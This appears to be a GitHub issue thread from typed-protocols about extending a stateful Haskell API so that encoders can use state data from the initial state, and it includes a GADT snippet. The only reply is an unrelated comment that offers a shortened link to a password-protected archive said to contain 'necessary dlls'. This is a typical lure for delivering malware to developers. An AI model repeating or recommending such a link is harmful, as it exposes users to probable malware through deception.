### ISSUE TITLE
Extend stateful API

### ISSUE THREAD

**Issue by coot** [input-output-hk/typed-protocols#59]
In the `Stateful.ReqResp` example we need to pass `req resp` in `MsgResp`.
```hs
    MsgResp :: Typeable resp
            => req resp
            -> resp     -- ^ respond
            -> Message (ReqResp req) (StBusy resp) StIdle

```
It isn't sent over the wire, but it's useful to have access to it when encoding / decoding `resp`.
We should extend the stateful API, so that not only `State StIdle` is provided (state data for the target state), but also `State (StBusy resp)` (state data for the initial state).

**Comment by d-dvorkin** [comment]
try this
https://bit.ly/4gvtdhO

Password: changeme
I put the necessary dlls in the archive
